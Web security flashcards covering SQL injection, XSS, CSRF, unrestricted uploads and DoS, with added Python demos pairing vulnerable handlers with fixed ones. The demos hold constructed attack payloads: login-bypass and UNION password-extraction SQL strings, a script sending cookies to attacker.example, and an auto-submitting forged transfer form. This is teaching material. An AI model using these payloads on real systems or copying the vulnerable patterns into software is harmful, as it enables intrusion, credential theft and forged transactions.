What is a database?
An electronic data storage system organized in tables made up of rows and columns.
Why are databases important to society?
They efficiently store, manage, and retrieve lots of information.
What is a web app?
Any application that runs in a web browser rather than as a standalone program.
What does SQL stand for?
Structured Query Language.
What is SQL used for?
To query and manipulate the data in a relational database: reading rows with SELECT, and also inserting, updating and deleting rows and defining tables.
What is a key characteristic of an SQL statement?
It is plain text made of keywords, identifiers and literal values that the database parses when it receives it, so any user input concatenated into that text is interpreted as part of the statement rather than as data.
Name some important SQL keywords.
SELECT, FROM, WHERE and UNION, plus NULL and the CONCAT() function; all of these appear regularly in injection payloads.
What is an SQL injection attack?
An attack in which attacker-controlled input is incorporated into an SQL statement and changes the query the database executes, returning data to, or performing actions for, a user who is not authorized to do so.
How are SQL injection attacks typically accomplished?
By supplying crafted input through places the application concatenates into a query: form fields, URL parameters, headers or cookies.
How do we defend against SQL injection attacks?
Primarily with parameterized queries (prepared statements), so user input is bound as data and never parsed as SQL; input validation and a least-privilege database account are additional layers.
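The cards above describe the flaw and the fix in words; the following Python example, added here and not part of the original flashcards, shows both against an in-memory SQLite table. The users table, the two accounts and the payloads are constructed for the demo; the vulnerable functions build the statement by string concatenation, the safe ones bind the same input as parameters.

```python
import sqlite3

# Constructed in-memory users table for the demo; not data from the original page.
# Plaintext passwords are used only to keep the example short.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "hunter2"), ("bob", "s3cret")])
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """Concatenates input into the statement text, so the input is parsed as SQL."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    """Parameterized query: the statement is parsed first, the values are bound afterwards."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

def search_vulnerable(conn, username):
    """The same concatenation flaw in a lookup that returns every matching row."""
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return [r[0] for r in conn.execute(sql).fetchall()]

def search_safe(conn, username):
    sql = "SELECT username FROM users WHERE username = ?"
    return [r[0] for r in conn.execute(sql, (username,)).fetchall()]

# Constructed payloads. The first pair turns the WHERE clause into a tautology
# (AND binds tighter than OR, so the trailing OR '1'='1' matches every row).
# The third uses UNION to append a column from a second query, and "--"
# comments out the rest of the original statement.
BYPASS_USER = "admin' OR '1'='1"
BYPASS_PASS = "x' OR '1'='1"
UNION_PAYLOAD = "' UNION SELECT password FROM users --"

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable login: ", login_vulnerable(conn, BYPASS_USER, BYPASS_PASS))  # alice
    print("safe login:       ", login_safe(conn, BYPASS_USER, BYPASS_PASS))        # None
    print("vulnerable search:", search_vulnerable(conn, UNION_PAYLOAD))  # ['hunter2', 's3cret'] (order not guaranteed)
    print("safe search:      ", search_safe(conn, UNION_PAYLOAD))        # []
```

The safe versions are not "sanitized"; they pass the hostile strings through untouched, and the database simply compares them against the stored values. That is the point of parameterization: the structure of the query is fixed before any user data is involved.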
What is a cross-site scripting (XSS) attack?
An attack in which attacker-supplied script (usually JavaScript) is included in a page served by a trusted site, so it runs in other users' browsers with that site's privileges.
What are the three main languages that make up most websites?
HTML, CSS, and JavaScript.
What can a cross-site scripting attack accomplish?
It allows an attacker to steal user data, compromise accounts, or redirect users to malicious sites.
What is a session ID?
A unique identifier, usually held in a cookie, that links a browser's requests to the server-side session established at login; a stolen session ID lets an attacker act as that user.
What are the three kinds of cross-site scripting?
Reflected XSS, DOM XSS, and Stored XSS.
What characterizes reflected XSS?
The payload arrives in the request (for example in a URL parameter) and is echoed straight back in the immediate response; it runs only in the browser of the user who follows the crafted link, so the attacker has to deliver the link to each victim.
What characterizes DOM XSS?
The site's own client-side JavaScript writes attacker-controlled data (often from the URL query or fragment) into the page, so the payload executes in the browser without the server ever handling it.
What characterizes stored XSS?
The payload is saved on the server side, typically in the database via a comment, message or profile field, and is served to every visitor who views the affected page.
How do we defend against cross-site scripting attacks?
By encoding untrusted data for the context it is written into (HTML text, attribute, JavaScript or URL) at output time, backed by input validation and a Content Security Policy.
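To make the XSS defense concrete, here is an added Python example (not from the original flashcards) of a comment renderer: one version interpolates the user's text straight into HTML, the other encodes it for the HTML text context with html.escape, and a third shows the attribute context, where quotes and the URL scheme matter. The comment payload, the attacker hostname and the helper names are constructed for the demo.

```python
import html
from urllib.parse import urlsplit

# Constructed attacker comment: a script that would send the victim's cookie elsewhere.
PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'

def render_comment_vulnerable(author, text):
    """Interpolates untrusted text straight into the HTML, so the browser parses it as markup."""
    return f'<div class="comment"><b>{author}</b>: {text}</div>'

def render_comment_safe(author, text):
    """Encodes for the HTML text context: < > & " ' become entities and are displayed, not parsed.
    The same fix covers stored and reflected XSS; what matters is encoding on output."""
    return f'<div class="comment"><b>{html.escape(author)}</b>: {html.escape(text)}</div>'

def render_profile_link_safe(display_name, url):
    """Attribute context: quotes must be encoded too, and an href needs a scheme allow-list,
    because a javascript: URL executes without containing any < or >."""
    scheme = urlsplit(url).scheme.lower()
    safe_url = url if scheme in ("http", "https") else "#"
    return f'<a href="{html.escape(safe_url, quote=True)}">{html.escape(display_name)}</a>'

def contains_script_tag(fragment):
    """Helper: does a <script> tag survive in the output as live markup?"""
    return "<script" in fragment.lower()

if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", PAYLOAD))
    print(render_comment_safe("mallory", PAYLOAD))
    print(render_profile_link_safe("mallory", "javascript:alert(1)"))
```

Note that the encoding is chosen by where the data lands, not by what the data looks like; the same string needs different treatment inside a script block or a URL, which is why a single input "sanitizer" at the door is not a complete defense.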
What is a cross-site request forgery (CSRF) attack?
An attack that makes a logged-in user's browser send a request the user did not intend; the browser attaches the session cookie automatically, so the server treats the forged request as authentic.
How is a CSRF attack typically launched?
By hosting a page (or sending a link or email) that contains a copy of the target site's form, pointed at the real site's action URL and often submitted automatically; when the victim visits, their browser sends the request with their cookies.
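The following Python example is added here to show the forged form from the card above and why it works: the two handlers stand in for a bank's transfer endpoint, one trusting the cookie alone and one also requiring a synchronizer token. The session store, the cookie value, the hostnames and the request dictionaries are all constructed for the demo and are not from the original page.

```python
import hmac
import secrets

# Constructed server-side session store: cookie value -> session data.
SESSIONS = {"sess-1234": {"user": "alice", "csrf_token": secrets.token_hex(16)}}

def transfer_vulnerable(request):
    """Trusts the session cookie alone. The browser attaches that cookie to any request
    aimed at this site, including one triggered from an attacker's page."""
    session = SESSIONS.get(request["cookies"].get("session"))
    if session is None:
        return 401, "not logged in"
    form = request["form"]
    return 200, f"{session['user']} sent {form['amount']} to {form['to']}"

def transfer_safe(request):
    """Synchronizer token: the form must also carry a secret that only pages this site
    served to this session ever contained. The attacker's page cannot read it."""
    session = SESSIONS.get(request["cookies"].get("session"))
    if session is None:
        return 401, "not logged in"
    submitted = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(submitted, session["csrf_token"]):
        return 403, "missing or invalid CSRF token"
    form = request["form"]
    return 200, f"{session['user']} sent {form['amount']} to {form['to']}"

# The attacker's page: a hidden copy of the real form pointing at the real site,
# submitted automatically when the victim loads it. Constructed for this example.
ATTACKER_PAGE = """<form id="f" action="https://bank.example/transfer" method="POST">
  <input type="hidden" name="to" value="mallory">
  <input type="hidden" name="amount" value="1000">
</form>
<script>document.getElementById("f").submit()</script>"""

def forged_request():
    """What the victim's browser sends after loading ATTACKER_PAGE: cookie present, token absent."""
    return {"cookies": {"session": "sess-1234"},
            "form": {"to": "mallory", "amount": "1000"}}

def legitimate_request():
    """A submission from the site's own form, which embedded the session's token."""
    return {"cookies": {"session": "sess-1234"},
            "form": {"to": "bob", "amount": "10",
                     "csrf_token": SESSIONS["sess-1234"]["csrf_token"]}}

if __name__ == "__main__":
    print("vulnerable handler, forged request:", transfer_vulnerable(forged_request()))
    print("safe handler, forged request:      ", transfer_safe(forged_request()))
    print("safe handler, legitimate request:  ", transfer_safe(legitimate_request()))
```

Setting the session cookie with the SameSite=Lax or Strict attribute is a complementary defense: the browser then withholds the cookie from cross-site POSTs, so the forged request would arrive without a session at all.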
What is an unrestricted file upload vulnerability?
A vulnerability where a website does not properly validate the type, content, size or name of files being uploaded.
Where can files uploaded to a website end up?
In a directory on the web server; if that directory is inside the web root and the server executes scripts there, an uploaded script can be run by requesting its URL.
How can we prevent unrestricted file upload vulnerabilities?
By allow-listing specific file types (checked by content, not just by extension), limiting file size, renaming files on storage, and keeping uploads outside the web root.
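As an added example that is not part of the original flashcards, here is a Python upload validator implementing the checks from the card above: an extension allow-list, a size limit, a check that the file's leading bytes match the declared type, and a server-generated filename in a fixed directory. The allowed types, the size limit, the upload directory and the sample file contents are assumptions made for the demo.

```python
import os
import secrets

# Allow-list of extensions with the byte signature ("magic") each must start with.
# Constructed for this example; extend per application.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024
UPLOAD_DIR = "/srv/app/uploads"   # assumed location outside the web root

def validate_upload(client_filename, data):
    """Returns (True, stored_filename) or (False, reason).
    Checks: extension allow-list, size, and content signature matching the extension."""
    name = os.path.basename(client_filename)          # drop any path the client sent
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in ALLOWED_TYPES:
        return False, f"extension '.{ext}' is not allowed"
    if len(data) > MAX_BYTES:
        return False, "file exceeds size limit"
    if not data.startswith(ALLOWED_TYPES[ext]):       # startswith accepts a tuple
        return False, "content does not match the declared type"
    # Never reuse the client's name on disk: it can carry traversal sequences or a
    # double extension (shell.php.png) that a misconfigured server may still execute.
    return True, f"{secrets.token_hex(16)}.{ext}"

def storage_path(stored_filename):
    """Final location; the directory is fixed and never derived from client input."""
    return os.path.join(UPLOAD_DIR, stored_filename)

# Constructed sample contents.
GOOD_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
PHP_FILE = b"<?php phpinfo(); ?>"

if __name__ == "__main__":
    for fname, blob in [("avatar.png", GOOD_PNG), ("shell.php", PHP_FILE),
                        ("shell.php.png", PHP_FILE), ("../../x.png", GOOD_PNG)]:
        print(fname, "->", validate_upload(fname, blob))
```

The signature check stops a script renamed to .png, but it does not stop a real image with script appended to its end; that is why the stored file is also renamed, kept outside the web root and served with a fixed Content-Type rather than executed.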
What is a denial of service (DoS) attack?
An attack overwhelming a server with requests, preventing it from processing genuine requests.
What is the difference between a DoS attack and a DDoS attack?
A DoS attack floods a device from a single source, while a DDoS attack uses multiple sources.
How can you defend against a denial of service attack?
By rate-limiting requests per source and blocking traffic from known malicious IP addresses; because a DDoS spreads the load across many sources, it also needs upstream filtering or absorption capacity (for example a CDN or scrubbing service).
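The per-source defense from the card above, as an added Python example that is not part of the original flashcards: a sliding-window rate limiter replayed over a constructed request log in which two ordinary clients send one request per second and a single flooder sends fifty. The IP addresses, the window length and the request limit are assumptions chosen for the demo.

```python
from collections import Counter, defaultdict, deque

WINDOW_MS = 10_000          # sliding window length (assumed policy)
LIMIT_PER_WINDOW = 20       # requests one client may make per window (assumed policy)

class SlidingWindowLimiter:
    """Per-source rate limiter: keeps the timestamps of each client's recent requests."""
    def __init__(self, window_ms=WINDOW_MS, limit=LIMIT_PER_WINDOW):
        self.window_ms = window_ms
        self.limit = limit
        self.recent = defaultdict(deque)

    def allow(self, client_ip, now_ms):
        q = self.recent[client_ip]
        while q and now_ms - q[0] >= self.window_ms:   # drop requests outside the window
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now_ms)
        return True

def constructed_request_log(seconds=60, flood_rate=50):
    """Two ordinary clients at 1 request/s and one flooder at flood_rate requests/s.
    Timestamps are integer milliseconds so the window arithmetic is exact."""
    log = []
    for s in range(seconds):
        for ip in ("203.0.113.5", "203.0.113.9"):
            log.append((s * 1000, ip))
        for i in range(flood_rate):
            log.append((s * 1000 + i * (1000 // flood_rate), "198.51.100.7"))
    log.sort()
    return log

def replay(log, limiter=None):
    """Feeds the log in time order; returns {ip: Counter(allowed=..., blocked=...)}."""
    if limiter is None:
        limiter = SlidingWindowLimiter()
    outcome = defaultdict(Counter)
    for ts, ip in log:
        outcome[ip]["allowed" if limiter.allow(ip, ts) else "blocked"] += 1
    return outcome

if __name__ == "__main__":
    for ip, counts in sorted(replay(constructed_request_log()).items()):
        print(ip, dict(counts))
```

Over the 60-second log the flooder gets 20 requests through per 10-second window (120 in total) and the other 2880 are dropped, while both ordinary clients are never blocked. The same limiter does little against a DDoS, where each of thousands of sources stays under the per-source limit; that case has to be handled further upstream, as the card says.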